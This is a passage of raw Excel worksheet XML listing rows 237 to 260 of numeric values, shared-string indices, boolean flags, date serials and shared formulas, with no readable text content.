        <v>44811.29027777778</v>
      </c>
      <c r="I237" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J237" s="1" t="s">
        <v>1197</v>
      </c>
      <c r="K237" s="2" t="s">
        <v>1198</v>
      </c>
      <c r="L237" s="1">
        <v>4.0</v>
      </c>
      <c r="M237" s="1">
        <v>8.0</v>
      </c>
      <c r="N237" s="1" t="s">
        <v>1214</v>
      </c>
      <c r="O237" s="1" t="s">
        <v>1199</v>
      </c>
      <c r="P237" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q237" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R237" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S237" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="238">
      <c r="A238" s="1">
        <v>2825.0</v>
      </c>
      <c r="B238" s="2" t="s">
        <v>1215</v>
      </c>
      <c r="C238" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D238" s="2" t="s">
        <v>1216</v>
      </c>
      <c r="E238" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F238" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G238" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H238" s="1" t="s">
        <v>1217</v>
      </c>
      <c r="I238" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J238" s="1" t="s">
        <v>1218</v>
      </c>
      <c r="K238" s="2" t="s">
        <v>1219</v>
      </c>
      <c r="L238" s="1">
        <v>1.0</v>
      </c>
      <c r="M238" s="1">
        <v>1.0</v>
      </c>
      <c r="N238" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O238" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P238" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q238" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R238" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S238" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="239">
      <c r="A239" s="1">
        <v>2826.0</v>
      </c>
      <c r="B239" s="2" t="s">
        <v>1220</v>
      </c>
      <c r="C239" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D239" s="2" t="s">
        <v>1216</v>
      </c>
      <c r="E239" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F239" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G239" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H239" s="1" t="s">
        <v>1221</v>
      </c>
      <c r="I239" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J239" s="1" t="s">
        <v>1222</v>
      </c>
      <c r="K239" s="2" t="s">
        <v>1223</v>
      </c>
      <c r="L239" s="1">
        <v>1.0</v>
      </c>
      <c r="M239" s="1">
        <v>1.0</v>
      </c>
      <c r="N239" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O239" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P239" s="1" t="s">
        <v>573</v>
      </c>
      <c r="Q239" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R239" s="2">
        <f t="shared" si="2"/>
        <v>6</v>
      </c>
      <c r="S239" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="240">
      <c r="A240" s="1">
        <v>2835.0</v>
      </c>
      <c r="B240" s="2" t="s">
        <v>1224</v>
      </c>
      <c r="C240" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D240" s="2" t="s">
        <v>1225</v>
      </c>
      <c r="E240" s="2" t="s">
        <v>1226</v>
      </c>
      <c r="F240" s="1" t="s">
        <v>1227</v>
      </c>
      <c r="G240" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H240" s="1" t="s">
        <v>1228</v>
      </c>
      <c r="I240" s="1" t="s">
        <v>273</v>
      </c>
      <c r="J240" s="1" t="s">
        <v>1229</v>
      </c>
      <c r="K240" s="2" t="s">
        <v>1230</v>
      </c>
      <c r="L240" s="1">
        <v>3.0</v>
      </c>
      <c r="M240" s="1">
        <v>3.0</v>
      </c>
      <c r="N240" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O240" s="1" t="s">
        <v>1231</v>
      </c>
      <c r="P240" s="1" t="s">
        <v>1232</v>
      </c>
      <c r="Q240" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R240" s="2">
        <f t="shared" si="2"/>
        <v>11</v>
      </c>
      <c r="S240" s="1">
        <f t="shared" si="3"/>
        <v>11</v>
      </c>
    </row>
    <row r="241">
      <c r="A241" s="1">
        <v>2836.0</v>
      </c>
      <c r="B241" s="2" t="s">
        <v>1233</v>
      </c>
      <c r="C241" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D241" s="2" t="s">
        <v>1234</v>
      </c>
      <c r="E241" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F241" s="1" t="s">
        <v>1235</v>
      </c>
      <c r="G241" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H241" s="1" t="s">
        <v>1236</v>
      </c>
      <c r="I241" s="1" t="s">
        <v>273</v>
      </c>
      <c r="J241" s="1" t="s">
        <v>1229</v>
      </c>
      <c r="K241" s="2" t="s">
        <v>1230</v>
      </c>
      <c r="L241" s="1">
        <v>3.0</v>
      </c>
      <c r="M241" s="1">
        <v>3.0</v>
      </c>
      <c r="N241" s="1" t="s">
        <v>199</v>
      </c>
      <c r="O241" s="1" t="s">
        <v>1231</v>
      </c>
      <c r="P241" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q241" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R241" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S241" s="1">
        <f t="shared" si="3"/>
        <v>11</v>
      </c>
    </row>
    <row r="242">
      <c r="A242" s="1">
        <v>3023.0</v>
      </c>
      <c r="B242" s="2" t="s">
        <v>1237</v>
      </c>
      <c r="C242" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D242" s="2" t="s">
        <v>1238</v>
      </c>
      <c r="E242" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F242" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G242" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H242" s="4">
        <v>44507.924305555556</v>
      </c>
      <c r="I242" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J242" s="1" t="s">
        <v>1239</v>
      </c>
      <c r="K242" s="2" t="s">
        <v>1240</v>
      </c>
      <c r="L242" s="1">
        <v>1.0</v>
      </c>
      <c r="M242" s="1">
        <v>1.0</v>
      </c>
      <c r="N242" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O242" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P242" s="1" t="s">
        <v>1241</v>
      </c>
      <c r="Q242" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R242" s="2">
        <f t="shared" si="2"/>
        <v>11</v>
      </c>
      <c r="S242" s="1">
        <f t="shared" si="3"/>
        <v>11</v>
      </c>
    </row>
    <row r="243">
      <c r="A243" s="1">
        <v>3024.0</v>
      </c>
      <c r="B243" s="2" t="s">
        <v>1242</v>
      </c>
      <c r="C243" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D243" s="2" t="s">
        <v>1243</v>
      </c>
      <c r="E243" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F243" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G243" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H243" s="4">
        <v>44409.93194444444</v>
      </c>
      <c r="I243" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J243" s="1" t="s">
        <v>1244</v>
      </c>
      <c r="K243" s="2" t="s">
        <v>1245</v>
      </c>
      <c r="L243" s="1">
        <v>1.0</v>
      </c>
      <c r="M243" s="1">
        <v>1.0</v>
      </c>
      <c r="N243" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O243" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P243" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q243" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R243" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S243" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="244">
      <c r="A244" s="1">
        <v>3026.0</v>
      </c>
      <c r="B244" s="2" t="s">
        <v>1246</v>
      </c>
      <c r="C244" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D244" s="2" t="s">
        <v>1247</v>
      </c>
      <c r="E244" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F244" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G244" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H244" s="4">
        <v>44353.69027777778</v>
      </c>
      <c r="I244" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J244" s="1" t="s">
        <v>1248</v>
      </c>
      <c r="K244" s="2" t="s">
        <v>1249</v>
      </c>
      <c r="L244" s="1">
        <v>1.0</v>
      </c>
      <c r="M244" s="1">
        <v>1.0</v>
      </c>
      <c r="N244" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O244" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P244" s="1" t="s">
        <v>1250</v>
      </c>
      <c r="Q244" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R244" s="2">
        <f t="shared" si="2"/>
        <v>10</v>
      </c>
      <c r="S244" s="1">
        <f t="shared" si="3"/>
        <v>10</v>
      </c>
    </row>
    <row r="245">
      <c r="A245" s="1">
        <v>3027.0</v>
      </c>
      <c r="B245" s="2" t="s">
        <v>1251</v>
      </c>
      <c r="C245" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D245" s="2" t="s">
        <v>1252</v>
      </c>
      <c r="E245" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F245" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G245" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H245" s="4">
        <v>44380.634722222225</v>
      </c>
      <c r="I245" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J245" s="1" t="s">
        <v>1253</v>
      </c>
      <c r="K245" s="2" t="s">
        <v>1254</v>
      </c>
      <c r="L245" s="1">
        <v>1.0</v>
      </c>
      <c r="M245" s="1">
        <v>1.0</v>
      </c>
      <c r="N245" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O245" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P245" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q245" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R245" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S245" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="246">
      <c r="A246" s="1">
        <v>3028.0</v>
      </c>
      <c r="B246" s="2" t="s">
        <v>1255</v>
      </c>
      <c r="C246" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D246" s="2" t="s">
        <v>1256</v>
      </c>
      <c r="E246" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F246" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G246" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H246" s="4">
        <v>44411.688888888886</v>
      </c>
      <c r="I246" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J246" s="1" t="s">
        <v>1257</v>
      </c>
      <c r="K246" s="2" t="s">
        <v>1258</v>
      </c>
      <c r="L246" s="1">
        <v>1.0</v>
      </c>
      <c r="M246" s="1">
        <v>1.0</v>
      </c>
      <c r="N246" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O246" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P246" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q246" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R246" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S246" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="247">
      <c r="A247" s="1">
        <v>3029.0</v>
      </c>
      <c r="B247" s="2" t="s">
        <v>1259</v>
      </c>
      <c r="C247" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D247" s="2" t="s">
        <v>1260</v>
      </c>
      <c r="E247" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F247" s="1" t="s">
        <v>1261</v>
      </c>
      <c r="G247" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H247" s="1" t="s">
        <v>1262</v>
      </c>
      <c r="I247" s="1" t="s">
        <v>1263</v>
      </c>
      <c r="J247" s="1" t="s">
        <v>1264</v>
      </c>
      <c r="K247" s="2" t="s">
        <v>1265</v>
      </c>
      <c r="L247" s="1">
        <v>1.0</v>
      </c>
      <c r="M247" s="1">
        <v>1.0</v>
      </c>
      <c r="N247" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O247" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P247" s="1" t="s">
        <v>1063</v>
      </c>
      <c r="Q247" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R247" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S247" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="248">
      <c r="A248" s="1">
        <v>3030.0</v>
      </c>
      <c r="B248" s="2" t="s">
        <v>1266</v>
      </c>
      <c r="C248" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D248" s="2" t="s">
        <v>1267</v>
      </c>
      <c r="E248" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F248" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G248" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H248" s="1" t="s">
        <v>1268</v>
      </c>
      <c r="I248" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J248" s="1" t="s">
        <v>1269</v>
      </c>
      <c r="K248" s="2" t="s">
        <v>1270</v>
      </c>
      <c r="L248" s="1">
        <v>1.0</v>
      </c>
      <c r="M248" s="1">
        <v>1.0</v>
      </c>
      <c r="N248" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O248" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P248" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q248" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R248" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S248" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="249">
      <c r="A249" s="1">
        <v>3031.0</v>
      </c>
      <c r="B249" s="2" t="s">
        <v>1271</v>
      </c>
      <c r="C249" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D249" s="2" t="s">
        <v>1272</v>
      </c>
      <c r="E249" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F249" s="1" t="s">
        <v>1273</v>
      </c>
      <c r="G249" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H249" s="1" t="s">
        <v>1274</v>
      </c>
      <c r="I249" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J249" s="1" t="s">
        <v>1275</v>
      </c>
      <c r="K249" s="2" t="s">
        <v>1276</v>
      </c>
      <c r="L249" s="1">
        <v>1.0</v>
      </c>
      <c r="M249" s="1">
        <v>1.0</v>
      </c>
      <c r="N249" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O249" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P249" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q249" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R249" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S249" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="250">
      <c r="A250" s="1">
        <v>3034.0</v>
      </c>
      <c r="B250" s="2" t="s">
        <v>1277</v>
      </c>
      <c r="C250" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D250" s="2" t="s">
        <v>1278</v>
      </c>
      <c r="E250" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F250" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G250" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H250" s="1" t="s">
        <v>1279</v>
      </c>
      <c r="I250" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J250" s="1" t="s">
        <v>1280</v>
      </c>
      <c r="K250" s="2" t="s">
        <v>1281</v>
      </c>
      <c r="L250" s="1">
        <v>1.0</v>
      </c>
      <c r="M250" s="1">
        <v>1.0</v>
      </c>
      <c r="N250" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O250" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P250" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q250" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R250" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S250" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="251">
      <c r="A251" s="1">
        <v>3407.0</v>
      </c>
      <c r="B251" s="2" t="s">
        <v>1282</v>
      </c>
      <c r="C251" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D251" s="2" t="s">
        <v>1283</v>
      </c>
      <c r="E251" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F251" s="1" t="s">
        <v>1284</v>
      </c>
      <c r="G251" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H251" s="1" t="s">
        <v>1285</v>
      </c>
      <c r="I251" s="1" t="s">
        <v>742</v>
      </c>
      <c r="J251" s="1" t="s">
        <v>1286</v>
      </c>
      <c r="K251" s="2" t="s">
        <v>1287</v>
      </c>
      <c r="L251" s="1">
        <v>1.0</v>
      </c>
      <c r="M251" s="1">
        <v>1.0</v>
      </c>
      <c r="N251" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O251" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P251" s="1" t="s">
        <v>1063</v>
      </c>
      <c r="Q251" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R251" s="2">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="S251" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="252">
      <c r="A252" s="1">
        <v>3469.0</v>
      </c>
      <c r="B252" s="2" t="s">
        <v>1288</v>
      </c>
      <c r="C252" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D252" s="2" t="s">
        <v>1289</v>
      </c>
      <c r="E252" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F252" s="1" t="s">
        <v>1290</v>
      </c>
      <c r="G252" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H252" s="1" t="s">
        <v>1291</v>
      </c>
      <c r="I252" s="1" t="s">
        <v>1292</v>
      </c>
      <c r="J252" s="1" t="s">
        <v>1293</v>
      </c>
      <c r="K252" s="2" t="s">
        <v>1294</v>
      </c>
      <c r="L252" s="1">
        <v>1.0</v>
      </c>
      <c r="M252" s="1">
        <v>1.0</v>
      </c>
      <c r="N252" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O252" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P252" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q252" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R252" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S252" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="253">
      <c r="A253" s="1">
        <v>3478.0</v>
      </c>
      <c r="B253" s="2" t="s">
        <v>1295</v>
      </c>
      <c r="C253" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D253" s="2" t="s">
        <v>1296</v>
      </c>
      <c r="E253" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F253" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G253" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H253" s="4">
        <v>44507.92638888889</v>
      </c>
      <c r="I253" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J253" s="1" t="s">
        <v>1297</v>
      </c>
      <c r="K253" s="2" t="s">
        <v>1298</v>
      </c>
      <c r="L253" s="1">
        <v>2.0</v>
      </c>
      <c r="M253" s="1">
        <v>2.0</v>
      </c>
      <c r="N253" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O253" s="1" t="s">
        <v>223</v>
      </c>
      <c r="P253" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q253" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R253" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S253" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="254">
      <c r="A254" s="1">
        <v>3480.0</v>
      </c>
      <c r="B254" s="2" t="s">
        <v>1299</v>
      </c>
      <c r="C254" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D254" s="2" t="s">
        <v>1300</v>
      </c>
      <c r="E254" s="2" t="s">
        <v>1301</v>
      </c>
      <c r="F254" s="1" t="s">
        <v>1302</v>
      </c>
      <c r="G254" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H254" s="4">
        <v>43528.93819444445</v>
      </c>
      <c r="I254" s="1" t="s">
        <v>1303</v>
      </c>
      <c r="J254" s="1" t="s">
        <v>1304</v>
      </c>
      <c r="K254" s="2" t="s">
        <v>1305</v>
      </c>
      <c r="L254" s="1">
        <v>5.0</v>
      </c>
      <c r="M254" s="1">
        <v>8.0</v>
      </c>
      <c r="N254" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O254" s="1" t="s">
        <v>1306</v>
      </c>
      <c r="P254" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q254" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R254" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S254" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="255">
      <c r="A255" s="1">
        <v>3490.0</v>
      </c>
      <c r="B255" s="2" t="s">
        <v>1307</v>
      </c>
      <c r="C255" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D255" s="2" t="s">
        <v>1308</v>
      </c>
      <c r="E255" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F255" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G255" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H255" s="1" t="s">
        <v>1309</v>
      </c>
      <c r="I255" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J255" s="1" t="s">
        <v>1310</v>
      </c>
      <c r="K255" s="2" t="s">
        <v>1311</v>
      </c>
      <c r="L255" s="1">
        <v>1.0</v>
      </c>
      <c r="M255" s="1">
        <v>1.0</v>
      </c>
      <c r="N255" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O255" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P255" s="1" t="s">
        <v>1063</v>
      </c>
      <c r="Q255" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R255" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S255" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="256">
      <c r="A256" s="1">
        <v>3491.0</v>
      </c>
      <c r="B256" s="2" t="s">
        <v>1312</v>
      </c>
      <c r="C256" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D256" s="2" t="s">
        <v>1313</v>
      </c>
      <c r="E256" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F256" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G256" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H256" s="4">
        <v>44531.94375</v>
      </c>
      <c r="I256" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J256" s="1" t="s">
        <v>1314</v>
      </c>
      <c r="K256" s="2" t="s">
        <v>1315</v>
      </c>
      <c r="L256" s="1">
        <v>1.0</v>
      </c>
      <c r="M256" s="1">
        <v>1.0</v>
      </c>
      <c r="N256" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O256" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P256" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q256" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R256" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S256" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="257">
      <c r="A257" s="1">
        <v>3512.0</v>
      </c>
      <c r="B257" s="2" t="s">
        <v>1316</v>
      </c>
      <c r="C257" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D257" s="2" t="s">
        <v>1317</v>
      </c>
      <c r="E257" s="2" t="s">
        <v>1318</v>
      </c>
      <c r="F257" s="1" t="s">
        <v>1319</v>
      </c>
      <c r="G257" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H257" s="1" t="s">
        <v>1320</v>
      </c>
      <c r="I257" s="1" t="s">
        <v>273</v>
      </c>
      <c r="J257" s="1" t="s">
        <v>1321</v>
      </c>
      <c r="K257" s="2" t="s">
        <v>1322</v>
      </c>
      <c r="L257" s="1">
        <v>2.0</v>
      </c>
      <c r="M257" s="1">
        <v>2.0</v>
      </c>
      <c r="N257" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O257" s="1" t="s">
        <v>1323</v>
      </c>
      <c r="P257" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q257" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R257" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S257" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="258">
      <c r="A258" s="1">
        <v>3514.0</v>
      </c>
      <c r="B258" s="2" t="s">
        <v>1324</v>
      </c>
      <c r="C258" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D258" s="2" t="s">
        <v>1317</v>
      </c>
      <c r="E258" s="2" t="s">
        <v>1318</v>
      </c>
      <c r="F258" s="1" t="s">
        <v>1319</v>
      </c>
      <c r="G258" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H258" s="4">
        <v>43986.53611111111</v>
      </c>
      <c r="I258" s="1" t="s">
        <v>1325</v>
      </c>
      <c r="J258" s="1" t="s">
        <v>1326</v>
      </c>
      <c r="K258" s="2" t="s">
        <v>1322</v>
      </c>
      <c r="L258" s="1">
        <v>1.0</v>
      </c>
      <c r="M258" s="1">
        <v>1.0</v>
      </c>
      <c r="N258" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O258" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P258" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q258" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R258" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S258" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="259">
      <c r="A259" s="1">
        <v>3517.0</v>
      </c>
      <c r="B259" s="2" t="s">
        <v>1327</v>
      </c>
      <c r="C259" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D259" s="2" t="s">
        <v>1328</v>
      </c>
      <c r="E259" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F259" s="1" t="s">
        <v>896</v>
      </c>
      <c r="G259" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H259" s="1" t="s">
        <v>1329</v>
      </c>
      <c r="I259" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J259" s="1" t="s">
        <v>1330</v>
      </c>
      <c r="K259" s="2" t="s">
        <v>1331</v>
      </c>
      <c r="L259" s="1">
        <v>1.0</v>
      </c>
      <c r="M259" s="1">
        <v>1.0</v>
      </c>
      <c r="N259" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O259" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P259" s="1" t="s">
        <v>1332</v>
      </c>
      <c r="Q259" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R259" s="2">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="S259" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="260">
      <c r="A260" s="1">
        <v>3518.0</v>
      </c>
      <c r="B260" s="2" t="s">
        <v>1333</v>
      </c>
      <c r="C260" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D260" s="2" t="s">
        <v>1334</v>
      </c>
      <c r="E260" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F260" s="1" t="s">
        <v>1076</v>
      </c>
      <c r="G260" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H260" s="1" t="s">
        <v>1335</v>
      </c>
      <c r="I260" s="1" t="s">
        <v>1078</v>
      </c>
      <c r="J260" s="1" t="s">
        <v>1336</v>
      </c>
      <c r="K260" s="2" t="s">
        <v>1337</v>
      </c>
      <c r="L260" s="1">
        <v>1.0</v>
      </c>
      <c r="M260" s="1">
        <v>1.0</v>
      </c>
      <c r="N260" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O260" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P260" s="1" t="s">
        <v>1338</v>
      </c>
      <c r="Q260" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R260" s="2">
